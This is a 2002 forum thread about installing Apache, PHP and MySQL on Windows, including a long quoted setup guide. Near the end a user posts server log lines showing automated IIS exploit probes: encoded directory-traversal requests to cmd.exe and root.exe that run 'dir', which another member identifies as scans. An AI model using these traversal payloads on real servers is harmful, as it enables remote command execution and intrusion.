Stop Microsoft

Miscellaneous => Applications => Topic started by: Aaron Ni on 19 July 2002, 10:30

Title: Apache 1.3.2 Download.
Post by: Aaron Ni on 19 July 2002, 10:30
Ok, I just downloaded the Installer for the Apache 1.3.2. server program for Win2K, NT, 95 ad 98.  I'm in WinME (Kill me!) so rather that let this go to waste I shall direct this download to this topic so everyone can gain!

I'm not sure how this Installer works, pretty sure you dont need a serial though.

Apache 1.3.2. (http://www.eliteprodigy.com/cgi-bin/download/download.pl?file=Apache)

Hope it works for someone.
Title: Apache 1.3.2 Download.
Post by: choasmaster on 19 July 2002, 10:33
doesn't matter, it should run on any  windows verison out there
Title: Apache 1.3.2 Download.
Post by: Aaron Ni on 20 July 2002, 06:41
Sure it will run on any version of Windows.. just will it actually work as a server on mine?!

Because that would be sweet.   :D
Title: Apache 1.3.2 Download.
Post by: choasmaster on 20 July 2002, 07:27
it should
Title: Apache 1.3.2 Download.
Post by: Aaron Ni on 20 July 2002, 21:51
Ok, so it's installed and it runs.  Just I havent a fucking clue one on how to work it!  :confused:

I'm assuming I need to register a domain name before the server works.. or something of that nature...

Gah, I'm a fool!    :(
Title: Apache 1.3.2 Download.
Post by: choasmaster on 20 July 2002, 11:26
it should have came with a bunch of docs, make yourself a fool not
Title: Apache 1.3.2 Download.
Post by: Aaron Ni on 21 July 2002, 04:26
A fool I am, the Apache deleted it is.

Just got on my nerves trying to figure it out.  And I'm not going to keep my computer running 24/7.
Title: Apache 1.3.2 Download.
Post by: choasmaster on 21 July 2002, 06:45
iv never gotten apache running on windows, its easy under redhat though
Title: Apache 1.3.2 Download.
Post by: TheLizardKing on 22 July 2002, 10:54
if your interested in getting apache to work under windows without a domain name, thats simple.

http://www.apache.org/dist/httpd/binaries/win32/ (http://www.apache.org/dist/httpd/binaries/win32/)

I perfer apache_2.0.39-win32-x86-no_ssl.msi but you could easily go with the earlier but more reliable apache_1.3.26-win32-x86-no_src.msi .

For installation just follow the simple install mechanism, and once complete, type "localhost" in your browser and badda bing you got an apache webserver.

if you want php, mysql or perl I can help ya out with those as well.  just as a recommandation, if you want php don't get 2.0.39, apaches latest version is a real pain in the behind to get working but if you had your heart set on it I could show you the work arounds.

[ July 22, 2002: Message edited by: TheLizardKing ]

Title: Apache 1.3.2 Download.
Post by: Aaron Ni on 23 July 2002, 04:39
Oh yes, thank you very much LK.
Title: Apache 1.3.2 Download.
Post by: Kintaro on 23 July 2002, 12:22
I have, but it cant handle any more than 16 connections on Windows 9x.

Microsoft BOB Server Edition.
Title: Apache 1.3.2 Download.
Post by: choasmaster on 23 July 2002, 12:38
i had apache running on a 100mhz slackware 8.0 machine once, it was sweet as can be
Title: Apache 1.3.2 Download.
Post by: TheQuirk on 24 July 2002, 02:47
This is a quote out of one of the (e)Books I have... I also included how to install MySQL and PHP (just in case.) If you need the instructions on how to install on *nix, just ask.

 
quote:

Brief Guide to PHP/MySQL
Installation and
Configuration
WHEN INSTALLING MYSQL AND PHP, you are faced with all kinds of options. The
variety of operating systems and installation options creates more permutations
than could possibly be handled in this book. Luckily, installation procedures for
both packages are documented well in each package’s respective documentation.
In this appendix we will cover the basic installation and configuration of MySQL
and PHP on Windows 98 and Unix systems. I’m assuming that you will be using
the Apache Web server on all platforms. For the Unix installation, this book will
document only the method of compiling the source code. If you wish to use RPMs
for your installation, you should consult the online manuals.
Windows 98 Installation
Start by copying the MySQL binaries from the CD-ROM accompanying this book or
the mysql.com site to your local drive. Do the same for Apache and PHP (the
appropriate download sites here are http://www.apache.org/dist (http://www.apache.org/dist) and http://
www.php.net/download). (http://www.php.net/download).) The names of the files will be something like the following
(they may be slightly different, depending on the version you are using):
 mysql-3.23.22-beta-win.zip
 apache_1_3_9_win32.exe
 php-4.0.1pl2-Win32.zip
Start by unzipping the mysql file and php files with your favorite unzip tool. (If you
don’t have one, we recommend Winzip, at http://www.winzip.com/.) (http://www.winzip.com/.)) Unzip them
into a directory you find convenient. We prefer using a separate directory for each.
Start with MySQL. In the directory where you unzipped the file, you will have a
file named setup.exe. Execute that file. Choose a directory (e.g. d:\mysqlinstall)
where you want it installed, and then in the next screen select a Typical installation.
(You may wish to examine the custom options, but with the Windows install there
are very few real options.)

At this point your MySQL installation is complete. To test it, go to the DOS
prompt and move to the directory you specified for your MySQL installation. Then
move to the subcategory named \bin. If you then type mysqld, the mysql daemon
should start. To test if your daemon is working, start up the mysql command-line
client by typing mysql. If the monitor starts up and looks like Figure B-1, MySQL is
working properly.

Next, you should install Apache.
This requires little more than double-clicking on the executable you copied from
the CD or the apache.org site. The installation is pretty easy: all you really need
to do is select a directory where you would like Apache to be installed. When it’s
completed, an Apache Group item will be added to the Start menu.

Note: Don’t start up Apache just yet. A little more configuration information
will follow.

Now on to PHP. You should have a folder into which you unzipped all the PHP
files. In that folder copy MSVCRT.DLL and PHP4TS.DLL to c:\windows\system. Then
rename php.ini-dist to php.ini and keep it in the same directory were you have the
php.exe file.
All you need to do at this point is make sure that Apache is aware of PHP and
that PHP is aware of MySQL.
First go to the directory where you installed Apache, find the httpd.conf file within
the \conf directory, and open it in a text editor. Add these three lines to the file:
ScriptAlias /php4/ “d:/php4/”
AddType application/x-httpd-php4 .php
Action application/x-httpd-php4 “/php4/php.exe”
Note that we indicated the d: drive because that’s how we set up our own system.
The c: drive will work just as well.
The first line indicates the path where PHP resides. The second tells Apache what
file extensions must be parsed as PHP, and the third gives the path to the php
executable file. Note using this type of installation, PHP will run as an executable,
not an Apache server module.
If you would like other file extensions to by parsed by PHP, simply add another
AddType line to the conf file; for example:
AddType application/x-httpd-php4 .phtml
There are a couple of other alterations you may have to make to your httpd.conf
file. If the server refuses to start, you may need to add something to the Server
Name directive. If you are using TCP/IP in your local area network, you may need
to add the IP address of your machine, for instance:
ServerName 192.168.1.2
Or if your machine is not networked, you may want to user the following
ServerName
ServerName 127.0.0.1
If you also have Personal Web Server running on your machine, you may wish
to change the port on which Apache runs. By default, Web servers listen on Port 80,
but you can change that by altering the Port line in the httpd.conf to something
else—perhaps 8080.
And that should do it. Start Apache through the Start Menu. Add a file to your
\htdocs folder that contains the phpinfo() function. When you call that function
you should see that everything is working properly, and that there is an entry for
MySQL. Figure B-2 shows the results of phpinfo().

Note that you don’t need to make any alterations in the php.ini file to make PHP
work with MySQL. MySQL support is, in fact, built into PHP for Windows.
Caution: If you uncomment the directive extension=php_mysql.dll, you will have all
kinds of problems getting a PHP page to load.

These are the basics you need to get going with PHP and MySQL on Windows.
Note that you can also install PHP as an ISAPI filter for Internet Information Server
(IIS) and PWS. The instructions for doing so are included in the readme.txt file
included in the PHP zip file. As of this writing, running PHP as an IIS filter is not
recommended in a production environment.



[ July 23, 2002: Message edited by: TheQuirk ]

Title: Apache 1.3.2 Download.
Post by: Aaron Ni on 20 August 2002, 10:27
Ok, I've been using my server to send people files and such so I dont have to put them on a disk or onto a website, very easy.   ;)  

Just tonight someone on dialup has been looking for directories on my server whenever it's turned on, I'll post the logs.

0] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
12.228.111.** - - [19/Aug/2002:20:01:53 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
12.228.251.** - - [19/Aug/2002:22:27:07 -0700] "GET / HTTP/1.1" 200 1145
12.228.251.** - - [19/Aug/2002:22:27:11 -0700] "GET /PDF/ HTTP/1.1" 200 2128
12.228.251.** - - [19/Aug/2002:22:27:12 -0700] "GET /icons/unknown.gif HTTP/1.1" 200 245
12.228.251.** - - [19/Aug/2002:22:27:12 -0700] "GET /icons/layout.gif HTTP/1.1" 200 276

12.228.148.*** - - [19/Aug/2002:22:28:57 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287
12.228.148.*** - - [19/Aug/2002:22:28:58 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285
12.228.148.*** - - [19/Aug/2002:22:28:58 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
12.228.148.*** - - [19/Aug/2002:22:28:59 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
12.228.148.*** - - [19/Aug/2002:22:28:59 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
12.228.148.*** - - [19/Aug/2002:22:29:00 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
12.228.148.*** - - [19/Aug/2002:22:29:01 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
12.228.148.*** - - [19/Aug/2002:22:29:01 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342
12.228.148.*** - - [19/Aug/2002:22:29:02 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
12.228.148.*** - - [19/Aug/2002:22:29:02 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
12.228.148.*** - - [19/Aug/2002:22:29:03 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
12.228.148.*** - - [19/Aug/2002:22:29:03 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
12.228.148.*** - - [19/Aug/2002:22:29:04 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
12.228.148.*** - - [19/Aug/2002:22:29:04 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
12.228.148.*** - - [19/Aug/2002:22:29:05 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
12.228.148.*** - - [19/Aug/2002:22:29:05 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309


Any idea?

EDIT: Took the last bits of the IP out.

[ August 20, 2002: Message edited by: Aaron-V2.2 ]

Title: Apache 1.3.2 Download.
Post by: voidmain on 20 August 2002, 10:34
Yes, you are being scanned for IIS vulnerabilities.  Since you are running Apache you don't have much to worry about.  You will see a lot of this, much coming from other sploited M$ servers. If you feel strongly about it, track the IP down, try and find the owner of the IP address (since it is dialup, report it to the "abuse" email address for the provider). Good luck getting a response out of them.  Maybe you will get lucky.
Title: Apache 1.3.2 Download.
Post by: Master of Reality on 20 August 2002, 10:38
all i can tell you is that their ISP is AT&T
Title: Apache 1.3.2 Download.
Post by: Chooco on 24 August 2002, 23:40
i haven't read the last half page of posts here....

you can run Apache on any Windows distro but it needs to be XP, NT or 2000 to automatically start itself when you start the computer.
the configuration file is apache/conf/httpd.conf
to start the program as a non service, go to dos and  go to the apache directory. i think the command is 'apache -k start' or 'apache start' or something like that. i only ever ran it as a service and for Linux.